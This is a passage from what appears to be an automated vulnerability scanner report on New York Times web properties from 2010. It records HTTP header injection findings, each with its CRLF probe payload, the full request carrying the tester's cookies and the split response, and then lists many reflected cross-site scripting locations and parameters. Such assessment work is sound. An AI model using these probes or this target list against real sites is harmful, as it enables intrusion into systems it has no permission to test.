Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/416d4
59dfc04082f/m/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 105b9%0d%0a853f313a162 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/people/105b9%0d%0a853f313a162/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/people/105b9
853f313a162/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload c3f03%0d%0ae6b0f96142d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/people/m/c3f03%0d%0ae6b0f96142d/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/people/m/c3f03
e6b0f96142d/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 919c2%0d%0ada221e78489 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/919c2%0d%0ada221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/919c2
da221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 22697%0d%0afed4a746118 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/22697%0d%0afed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/22697
fed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 30fc6%0d%0ad1ceed21046 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/30fc6%0d%0ad1ceed21046/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/30fc6
d1ceed21046/o/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ae3e4%0d%0aa980ea2e2c8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/subjects/ae3e4%0d%0aa980ea2e2c8/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/subjects/ae3e4
a980ea2e2c8/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 2d948%0d%0a63790b1a5b0 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/subjects/o/2d948%0d%0a63790b1a5b0/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/2d948
63790b1a5b0/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 4e69e%0d%0a3e883c89cca was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/subjects/o/oil_spills/4e69e%0d%0a3e883c89cca/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/4e69e
3e883c89cca/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

3. Cross-site scripting (reflected) previous next
There are 380 instances of this issue:

http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]
http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]
http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]
http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]
http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]
http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]
http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]
http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]
http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
